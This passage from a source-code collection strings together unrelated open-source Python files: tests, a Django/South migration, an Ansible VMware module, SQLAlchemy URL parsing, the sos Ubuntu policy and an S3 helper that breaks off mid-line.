Mock() lh = hardware.linux.LinuxHardware(module=module, load_on_init=False) lsblk_uuids = lh._lsblk_uuid() self.assertIsInstance(lsblk_uuids, dict) self.assertIn(b'/dev/loop0', lsblk_uuids) self.assertIn(b'/dev/sda1', 
lsblk_uuids) self.assertEqual(lsblk_uuids[b'/dev/mapper/an-example-mapper with a space in the name'], b'84639acb-013f-4d2f-9392-526a572b4373') self.assertEqual(lsblk_uuids[b'/dev/sda1'], b'32caaec3-ef40-4691-a3b6-438c3f9bc1c0')
gpl-3.0
xflr6/concepts
tests/test_tools.py
1
1642
import pytest from concepts import tools def test_maximal(): items = map(frozenset, ((1,), (2,), (3,), (1, 2))) assert set(tools.maximal(items)) == {frozenset([3]), frozenset([1, 2])} def test_sha256sum(tmp_path): filepath = tmp_path / 'spam.txt' filepath.write_text('spam', encoding='ascii') result = tools.sha256sum(filepath) assert result == '4e388ab32b10dc8dbc7e28144f552830adc74787c1e2c0824032078a79f227fb' def test_write_lines(tmp_path): filepath = tmp_path / 'spam.txt' tools.write_lines(filepath, ['spam']) assert filepath.read_text(encoding='ascii') == 'spam\n' def test_csv_iterows(tmp_path): filepath = tmp_path / 'spam.csv' filepath.write_bytes(b'name\r\nspam\r\n') rows = list(tools.csv_iterrows(filepath, dialect='excel')) assert rows == [['name'], ['spam']] def test_write_csv(tmp_path): filepath = tmp_path / 'spam.csv' tools.write_csv(filepath, [('spam',)], header=['name']) assert filepath.read_text(encoding='ascii') == ('name\n' 'spam\n') def test_dump_json_invalid_path(): with pytest.raises(TypeError, match=r'path_or_fileobj'): tools.dump_json({}, object()) def test_load_json_invalid_path(): with pytest.raises(TypeError, match=r'path_or_fileobj'): tools.load_json(object()) def test_dump_load(path_or_fileobj, encoding, obj={'sp\xe4m': 'eggs'}): tools.dump_json(obj, path_or_fileobj, encoding=encoding) if hasattr(path_or_fileobj, 'seek'): path_or_fileobj.seek(0) assert tools.load_json(path_or_fileobj, encoding=encoding) == obj
mit
nirmeshk/oh-mainline
mysite/profile/migrations/0042_asheesh_make_all_existing_dias_stale.py
17
10859
# This file is part of OpenHatch. # Copyright (C) 2009 OpenHatch, Inc. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from south.db import db from django.db import models from mysite.profile.models import * class Migration: no_dry_run = True def forwards(self, orm): # Adding field 'DataImportAttempt.stale' db.add_column('profile_dataimportattempt', 'stale', orm['profile.dataimportattempt:stale']) # Any existing DIAs ought to be made "stale" for dia in orm['profile.dataimportattempt'].objects.all(): dia.stale = True dia.save() def backwards(self, orm): # Deleting field 'DataImportAttempt.stale' db.delete_column('profile_dataimportattempt', 'stale') models = { 'auth.group': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'unique_together': "(('content_type', 'codename'),)"}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': 
'50'}) }, 'auth.user': { 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'}) }, 'contenttypes.contenttype': { 'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'profile.dataimportattempt': { 'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], 
{'primary_key': 'True'}), 'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}), 'person_wants_data': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'query': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '2'}), 'stale': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}) }, 'profile.link_person_tag': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"}) }, 'profile.link_project_tag': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"}) }, 'profile.link_projectexp_tag': { 'Meta': {'unique_together': "[('tag', 'project_exp', 'source')]"}, 'favorite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'project_exp': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.ProjectExp']"}), 'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"}) }, 'profile.link_sf_proj_dude_fm': { 'Meta': {'unique_together': "[('person', 'project')]"}, 'date_collected': ('django.db.models.fields.DateTimeField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_admin': 
('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgePerson']"}), 'position': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgeProject']"}) }, 'profile.person': { 'gotten_name_from_ohloh': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'interested_in_working_on': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024'}), 'last_polled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}), 'photo': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100'}), 'show_email': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'profile.projectexp': { 'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']", 'null': 'True'}), 'description': ('django.db.models.fields.TextField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'man_months': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}), 'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']", 'null': 'True'}), 'person_role': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'primary_language': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}), 'should_show_this': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 
'source': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}) }, 'profile.sourceforgeperson': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'profile.sourceforgeproject': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'unixname': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'profile.tag': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'tag_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.TagType']"}), 'text': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'profile.tagtype': { 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'prefix': ('django.db.models.fields.CharField', [], {'max_length': '20'}) }, 'search.project': { 'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'language': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'unique': 'True'}) } } complete_apps = ['profile']
agpl-3.0
zerothi/sids
sisl/tests/test_sgeom.py
1
4988
import pytest import math as m import numpy as np from sisl import Geometry, Atom, SuperCell from sisl.geometry import sgeom @pytest.fixture def setup(): class t(): def __init__(self): bond = 1.42 sq3h = 3.**.5 * 0.5 self.sc = SuperCell(np.array([[1.5, sq3h, 0.], [1.5, -sq3h, 0.], [0., 0., 10.]], np.float64) * bond, nsc=[3, 3, 1]) C = Atom(Z=6, R=[bond * 1.01] * 2) self.g = Geometry(np.array([[0., 0., 0.], [1., 0., 0.]], np.float64) * bond, atoms=C, sc=self.sc) self.mol = Geometry([[i, 0, 0] for i in range(10)], sc=[50]) def sg_g(**kwargs): kwargs['ret_geometry'] = True if 'geometry' not in kwargs: kwargs['geometry'] = self.g return sgeom(**kwargs) self.sg_g = sg_g def sg_mol(**kwargs): kwargs['ret_geometry'] = True if 'geometry' not in kwargs: kwargs['geometry'] = self.mol return sgeom(**kwargs) self.sg_mol = sg_mol return t() @pytest.mark.geometry class TestGeometry: def test_help(self): with pytest.raises(SystemExit): sgeom(argv=['--help']) def test_version(self): sgeom(argv=['--version']) def test_cite(self): sgeom(argv=['--cite']) def test_tile1(self, setup): cell = np.copy(setup.g.sc.cell) cell[0, :] *= 2 for tile in ['tile 2 x', 'tile-x 2']: tx = setup.sg_g(argv=('--' + tile).split()) assert np.allclose(cell, tx.sc.cell) cell[1, :] *= 2 for tile in ['tile 2 y', 'tile-y 2']: ty = setup.sg_g(geometry=tx, argv=('--' + tile).split()) assert np.allclose(cell, ty.sc.cell) cell[2, :] *= 2 for tile in ['tile 2 z', 'tile-z 2']: tz = setup.sg_g(geometry=ty, argv=('--' + tile).split()) assert np.allclose(cell, tz.sc.cell) def test_tile2(self, setup): cell = np.copy(setup.g.sc.cell) cell[:, :] *= 2 for xt in ['tile 2 x', 'tile-x 2']: xt = '--' + xt for yt in ['tile 2 y', 'tile-y 2']: yt = '--' + yt for zt in ['tile 2 z', 'tile-z 2']: zt = '--' + zt argv = ' '.join([xt, yt, zt]).split() t = setup.sg_g(argv=argv) assert np.allclose(cell, t.sc.cell) def test_repeat1(self, setup): cell = np.copy(setup.g.sc.cell) cell[0, :] *= 2 for repeat in ['repeat 2 x', 'repeat-x 2']: tx 
= setup.sg_g(argv=('--' + repeat).split()) assert np.allclose(cell, tx.sc.cell) cell[1, :] *= 2 for repeat in ['repeat 2 y', 'repeat-y 2']: ty = setup.sg_g(geometry=tx, argv=('--' + repeat).split()) assert np.allclose(cell, ty.sc.cell) cell[2, :] *= 2 for repeat in ['repeat 2 z', 'repeat-z 2']: tz = setup.sg_g(geometry=ty, argv=('--' + repeat).split()) assert np.allclose(cell, tz.sc.cell) def test_repeat2(self, setup): cell = np.copy(setup.g.sc.cell) cell[:, :] *= 2 for xt in ['repeat 2 x', 'repeat-x 2']: xt = '--' + xt for yt in ['repeat 2 y', 'repeat-y 2']: yt = '--' + yt for zt in ['repeat 2 z', 'repeat-z 2']: zt = '--' + zt argv = ' '.join([xt, yt, zt]).split() t = setup.sg_g(argv=argv) assert np.allclose(cell, t.sc.cell) def test_sub1(self, setup): for a, l in [('0', 1), ('0,1', 2), ('0-1', 2)]: g = setup.sg_g(argv=['--sub', a]) assert len(g) == l def test_rotation1(self, setup): rot = setup.sg_g(argv='--rotate 180 z'.split()) rot.sc.cell[2, 2] *= -1 assert np.allclose(-rot.sc.cell, setup.g.sc.cell) assert np.allclose(-rot.xyz, setup.g.xyz) rot = setup.sg_g(argv='--rotate-z 180'.split()) rot.sc.cell[2, 2] *= -1 assert np.allclose(-rot.sc.cell, setup.g.sc.cell) assert np.allclose(-rot.xyz, setup.g.xyz) rot = setup.sg_g(argv='--rotate rpi z'.split()) rot.sc.cell[2, 2] *= -1 assert np.allclose(-rot.sc.cell, setup.g.sc.cell) assert np.allclose(-rot.xyz, setup.g.xyz) rot = setup.sg_g(argv='--rotate-z rpi'.split()) rot.sc.cell[2, 2] *= -1 assert np.allclose(-rot.sc.cell, setup.g.sc.cell) assert np.allclose(-rot.xyz, setup.g.xyz) def test_swap(self, setup): s = setup.sg_g(argv='--swap 0 1'.split()) for i in [0, 1, 2]: assert np.allclose(setup.g.xyz[::-1, i], s.xyz[:, i])
lgpl-3.0
cryptobanana/ansible
lib/ansible/modules/cloud/vmware/vmware_target_canonical_facts.py
47
2585
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2015, Joseph Callen <jcallen () csc.com> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: vmware_target_canonical_facts short_description: Return canonical (NAA) from an ESXi host description: - Return canonical (NAA) from an ESXi host based on SCSI target ID version_added: "2.0" author: Joseph Callen notes: requirements: - Tested on vSphere 5.5 - PyVmomi installed options: target_id: description: - The target id based on order of scsi device required: True extends_documentation_fragment: vmware.documentation ''' EXAMPLES = ''' # Example vmware_target_canonical_facts command from Ansible Playbooks - name: Get Canonical name local_action: module: vmware_target_canonical_facts hostname: "{{ ansible_ssh_host }}" username: root password: vmware target_id: 7 ''' try: from pyVmomi import vim, vmodl HAS_PYVMOMI = True except ImportError: HAS_PYVMOMI = False from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.vmware import HAS_PYVMOMI, connect_to_api, get_all_objs, vmware_argument_spec def find_hostsystem(content): host_system = get_all_objs(content, [vim.HostSystem]) for host in host_system: return host return None def main(): argument_spec = vmware_argument_spec() argument_spec.update(dict(target_id=dict(required=True, type='int'))) module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False) if not HAS_PYVMOMI: module.fail_json(msg='pyvmomi is required for this module') content = connect_to_api(module) host = find_hostsystem(content) target_lun_uuid = {} scsilun_canonical = {} # Associate the scsiLun key with the canonicalName (NAA) for scsilun in host.config.storageDevice.scsiLun: scsilun_canonical[scsilun.key] = 
scsilun.canonicalName # Associate target number with LUN uuid for target in host.config.storageDevice.scsiTopology.adapter[0].target: for lun in target.lun: target_lun_uuid[target.target] = lun.scsiLun module.exit_json(changed=False, canonical=scsilun_canonical[target_lun_uuid[module.params['target_id']]]) if __name__ == '__main__': main()
gpl-3.0
jolevq/odoopub
extra-addons/account_bank_voucher_transfer/wizard/bank_statement_populate.py
7
2093
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2013 Cubic ERP - Teradata SAC (<http://cubicerp.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import osv class account_voucher_populate_statement(osv.osv_memory): _inherit = "account.voucher.populate.statement" def get_statement_line_new(self,cr,uid,voucher,statement,context=None): res = super(account_voucher_populate_statement,self).get_statement_line_new(cr,uid,voucher,statement,context=context) if voucher.type == 'transfer': sign = -1.0 account_id = voucher.transfer_id.src_journal_id.default_debit_account_id and voucher.transfer_id.src_journal_id.default_debit_account_id.id or res['account_id'] res['name'] = voucher.transfer_id.name res['ref'] = voucher.transfer_id.origin for line in voucher.line_ids: if line.account_id.type == 'payable': sign = -1.0 account_id = line.account_id.id if line.type == 'cr': sign = -1.0 * sign res['account_id'] = account_id res['amount'] = sign * res['amount'] res['type'] = (sign > 0) and 'customer' or 'supplier' return res
agpl-3.0
mikedanese/test-infra
metrics/influxdb_test.py
7
4440
#!/usr/bin/env python # Copyright 2017 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test influxdb.py.""" import BaseHTTPServer import threading import re import unittest import influxdb class TestInfluxPoint(unittest.TestCase): def test_from_dict(self): def check(sample, measurement, tags, fields, time): point = influxdb.Point.from_dict(sample) self.assertEqual(point.measurement, measurement) self.assertEqual(point.tags, tags) self.assertEqual(point.fields, fields) self.assertEqual(point.time, time) check( { 'measurement': 'metric', 'tags': {'style': 'stylish'}, 'fields': {'baseball': 'diamond', 'basketball': False}, 'time': 42 }, 'metric', {'style': 'stylish'}, {'baseball': 'diamond', 'basketball': False}, 42, ) check( { 'measurement': 'metric', 'tags': {}, 'fields': {'num': 2.7}, }, 'metric', {}, {'num': 2.7}, None, ) # Check that objects that don't meet the InfluxPoint spec are unchanged. 
sample = { 'measurement': 'metric', 'tags': {'tag': 'value'}, 'notfields': 'something', } self.assertEqual(influxdb.Point.from_dict(sample), sample) def test_serialize(self): def check(measurement, tags, fields, time, expected): point = influxdb.Point(measurement, tags, fields, time) self.assertEqual(point.serialize(), expected) check( 'metric', {'type': 'good'}, {'big?': True, 'size': 20}, 42, 'metric,type=good big?=True,size=20 42', ) check( 'measure with spaces', {'tag,with,comma': 'tagval=with=equals'}, {',,': 20.2, 'string': 'yarn'}, None, r'measure\ with\ spaces,tag\,with\,comma=tagval\=with\=equals \,\,=20.2,string="yarn"', ) check( 'measure with spaces', {'tag,with,comma': 'tagval=with=equals'}, {',,': 20.2, 'string': 'yarn'}, None, r'measure\ with\ spaces,tag\,with\,comma=tagval\=with\=equals \,\,=20.2,string="yarn"', ) class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_POST(self): # pylint: disable=invalid-name if not self.path.startswith('/write'): raise ValueError( 'path should start with \'/write\', but is \'%s\'' % self.path ) body = self.rfile.read(int(self.headers.getheader('content-length'))) new_ids = [int(match) for match in re.findall(r'id=(\d+)', body)] self.server.received = self.server.received.union(new_ids) self.send_response(201) class TestInfluxPusher(unittest.TestCase): def setUp(self): self.port = 8000 self.written = 0 self.test_server = BaseHTTPServer.HTTPServer( ('', self.port), RequestHandler, ) self.test_server.received = set() thread = threading.Thread(target=self.test_server.serve_forever) thread.start() def tearDown(self): self.test_server.shutdown() for num in xrange(self.written): self.assertIn(num, self.test_server.received) def test_push(self): points = [influxdb.Point('metric', {}, {'id': num}, None) for num in xrange(110)] pusher = influxdb.Pusher( 'localhost:%d' % self.port, None, 'username', 'pass123', ) pusher.push(points, 'mydb') self.written = 110 if __name__ == '__main__': unittest.main()
apache-2.0
cytec/SickRage
lib/sqlalchemy/engine/url.py
80
7492
# engine/url.py # Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """Provides the :class:`~sqlalchemy.engine.url.URL` class which encapsulates information about a database connection specification. The URL object is created automatically when :func:`~sqlalchemy.engine.create_engine` is called with a string argument; alternatively, the URL is a public-facing construct which can be used directly and is also accepted directly by ``create_engine()``. """ import re from .. import exc, util from . import Dialect from ..dialects import registry class URL(object): """ Represent the components of a URL used to connect to a database. This object is suitable to be passed directly to a :func:`~sqlalchemy.create_engine` call. The fields of the URL are parsed from a string by the :func:`.make_url` function. the string format of the URL is an RFC-1738-style string. All initialization parameters are available as public attributes. :param drivername: the name of the database backend. This name will correspond to a module in sqlalchemy/databases or a third party plug-in. :param username: The user name. :param password: database password. :param host: The name of the host. :param port: The port number. :param database: The database name. :param query: A dictionary of options to be passed to the dialect and/or the DBAPI upon connect. 
""" def __init__(self, drivername, username=None, password=None, host=None, port=None, database=None, query=None): self.drivername = drivername self.username = username self.password = password self.host = host if port is not None: self.port = int(port) else: self.port = None self.database = database self.query = query or {} def __to_string__(self, hide_password=True): s = self.drivername + "://" if self.username is not None: s += _rfc_1738_quote(self.username) if self.password is not None: s += ':' + ('***' if hide_password else _rfc_1738_quote(self.password)) s += "@" if self.host is not None: if ':' in self.host: s += "[%s]" % self.host else: s += self.host if self.port is not None: s += ':' + str(self.port) if self.database is not None: s += '/' + self.database if self.query: keys = list(self.query) keys.sort() s += '?' + "&".join("%s=%s" % (k, self.query[k]) for k in keys) return s def __str__(self): return self.__to_string__(hide_password=False) def __repr__(self): return self.__to_string__() def __hash__(self): return hash(str(self)) def __eq__(self, other): return \ isinstance(other, URL) and \ self.drivername == other.drivername and \ self.username == other.username and \ self.password == other.password and \ self.host == other.host and \ self.database == other.database and \ self.query == other.query def get_dialect(self): """Return the SQLAlchemy database dialect class corresponding to this URL's driver name. """ if '+' not in self.drivername: name = self.drivername else: name = self.drivername.replace('+', '.') cls = registry.load(name) # check for legacy dialects that # would return a module with 'dialect' as the # actual class if hasattr(cls, 'dialect') and \ isinstance(cls.dialect, type) and \ issubclass(cls.dialect, Dialect): return cls.dialect else: return cls def translate_connect_args(self, names=[], **kw): """Translate url attributes into a dictionary of connection arguments. 
Returns attributes of this url (`host`, `database`, `username`, `password`, `port`) as a plain dictionary. The attribute names are used as the keys by default. Unset or false attributes are omitted from the final dictionary. :param \**kw: Optional, alternate key names for url attributes. :param names: Deprecated. Same purpose as the keyword-based alternate names, but correlates the name to the original positionally. """ translated = {} attribute_names = ['host', 'database', 'username', 'password', 'port'] for sname in attribute_names: if names: name = names.pop(0) elif sname in kw: name = kw[sname] else: name = sname if name is not None and getattr(self, sname, False): translated[name] = getattr(self, sname) return translated def make_url(name_or_url): """Given a string or unicode instance, produce a new URL instance. The given string is parsed according to the RFC 1738 spec. If an existing URL object is passed, just returns the object. """ if isinstance(name_or_url, util.string_types): return _parse_rfc1738_args(name_or_url) else: return name_or_url def _parse_rfc1738_args(name): pattern = re.compile(r''' (?P<name>[\w\+]+):// (?: (?P<username>[^:/]*) (?::(?P<password>.*))? @)? (?: (?: \[(?P<ipv6host>[^/]+)\] | (?P<ipv4host>[^/:]+) )? (?::(?P<port>[^/]*))? )? (?:/(?P<database>.*))? 
''', re.X) m = pattern.match(name) if m is not None: components = m.groupdict() if components['database'] is not None: tokens = components['database'].split('?', 2) components['database'] = tokens[0] query = (len(tokens) > 1 and dict(util.parse_qsl(tokens[1]))) or None if util.py2k and query is not None: query = dict((k.encode('ascii'), query[k]) for k in query) else: query = None components['query'] = query if components['username'] is not None: components['username'] = _rfc_1738_unquote(components['username']) if components['password'] is not None: components['password'] = _rfc_1738_unquote(components['password']) ipv4host = components.pop('ipv4host') ipv6host = components.pop('ipv6host') components['host'] = ipv4host or ipv6host name = components.pop('name') return URL(name, **components) else: raise exc.ArgumentError( "Could not parse rfc1738 URL from string '%s'" % name) def _rfc_1738_quote(text): return re.sub(r'[:@/]', lambda m: "%%%X" % ord(m.group(0)), text) def _rfc_1738_unquote(text): return util.unquote(text) def _parse_keyvalue_args(name): m = re.match(r'(\w+)://(.*)', name) if m is not None: (name, args) = m.group(1, 2) opts = dict(util.parse_qsl(args)) return URL(name, *opts) else: return None
gpl-3.0
epssy/hue
desktop/core/ext-py/Django-1.6.10/tests/one_to_one/models.py
55
1604
""" 10. One-to-one relationships To define a one-to-one relationship, use ``OneToOneField()``. In this example, a ``Place`` optionally can be a ``Restaurant``. """ from __future__ import unicode_literals from django.db import models from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class Place(models.Model): name = models.CharField(max_length=50) address = models.CharField(max_length=80) def __str__(self): return "%s the place" % self.name @python_2_unicode_compatible class Restaurant(models.Model): place = models.OneToOneField(Place, primary_key=True) serves_hot_dogs = models.BooleanField(default=False) serves_pizza = models.BooleanField(default=False) def __str__(self): return "%s the restaurant" % self.place.name @python_2_unicode_compatible class Waiter(models.Model): restaurant = models.ForeignKey(Restaurant) name = models.CharField(max_length=50) def __str__(self): return "%s the waiter at %s" % (self.name, self.restaurant) class ManualPrimaryKey(models.Model): primary_key = models.CharField(max_length=10, primary_key=True) name = models.CharField(max_length = 50) class RelatedModel(models.Model): link = models.OneToOneField(ManualPrimaryKey) name = models.CharField(max_length = 50) @python_2_unicode_compatible class MultiModel(models.Model): link1 = models.OneToOneField(Place) link2 = models.OneToOneField(ManualPrimaryKey) name = models.CharField(max_length=50) def __str__(self): return "Multimodel %s" % self.name
apache-2.0
slashdd/sos
sos/policies/distros/ubuntu.py
1
2953
# This file is part of the sos project: https://github.com/sosreport/sos # # This copyrighted material is made available to anyone wishing to use, # modify, copy, or redistribute it subject to the terms and conditions of # version 2 of the GNU General Public License. # # See the LICENSE file in the source distribution for further information. from sos.report.plugins import UbuntuPlugin from sos.policies.distros.debian import DebianPolicy import os class UbuntuPolicy(DebianPolicy): distro = "Ubuntu" vendor = "Canonical" vendor_urls = [ ('Community Website', 'https://www.ubuntu.com/'), ('Commercial Support', 'https://www.canonical.com') ] PATH = "/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games" \ + ":/usr/local/sbin:/usr/local/bin:/snap/bin" _upload_url = "https://files.support.canonical.com/uploads/" _upload_user = "ubuntu" _upload_password = "ubuntu" _use_https_streaming = True def __init__(self, sysroot=None, init=None, probe_runtime=True, remote_exec=None): super(UbuntuPolicy, self).__init__(sysroot=sysroot, init=init, probe_runtime=probe_runtime, remote_exec=remote_exec) self.valid_subclasses += [UbuntuPlugin] @classmethod def check(cls, remote=''): """This method checks to see if we are running on Ubuntu. 
It returns True or False.""" if remote: return cls.distro in remote try: with open('/etc/lsb-release', 'r') as fp: return "Ubuntu" in fp.read() except IOError: return False def dist_version(self): """ Returns the version stated in DISTRIB_RELEASE """ try: with open('/etc/lsb-release', 'r') as fp: lines = fp.readlines() for line in lines: if "DISTRIB_RELEASE" in line: return line.split("=")[1].strip() return False except IOError: return False def get_upload_https_auth(self): if self.upload_url.startswith(self._upload_url): return (self._upload_user, self._upload_password) else: return super(UbuntuPolicy, self).get_upload_https_auth() def get_upload_url_string(self): if self.upload_url.startswith(self._upload_url): return "Canonical Support File Server" else: return self.get_upload_url() def get_upload_url(self): if not self.upload_url or self.upload_url.startswith(self._upload_url): if not self.upload_archive_name: return self._upload_url fname = os.path.basename(self.upload_archive_name) return self._upload_url + fname super(UbuntuPolicy, self).get_upload_url() # vim: set et ts=4 sw=4 :
gpl-2.0
sloanyang/Scrapy-BrowserBenchmark
bbenchmark/hanzo/warctools/s3.py
1
1445
from urlparse import urlparse from cStringIO import StringIO try: from boto.s3.connection import S3Connection from boto.s3.key import Key except ImportError: def open_url(url, offset=None, length=None): raise ImportError('boto') def list_files(prefix): raise ImportError('boto') else: def open_url(url, offset=None, length=None): p = urlparse(url) bucket_name = p.netloc key = p.path[1:] conn = S3Connection() bucket = conn.get_bucket(bucket_name) k = Key(bucket) k.key = key if offset is not None and length is not None: headers = {'Range': 'bytes=%d-%d' % (offset, offset + length)} elif offset is not None: headers = {'Range': 'bytes=%d-' % offset} else: headers = {} s = StringIO() k.get_contents_to_file(s, headers=headers) s.seek(0) return s def list_files(prefix): p = urlparse(prefix) bucket_name = p.netloc prefix = p.path[1:] conn = S3Connection() bucket = conn.get_bucket(bucket_name) complete = False marker = '' while not complete: rs = bucket.get_all_keys(prefix=prefix, marker=marker, delimiter='') for k in rs: yield 's3://%s/%s' % (bucket_name, k.key) marker = k.key complete = not 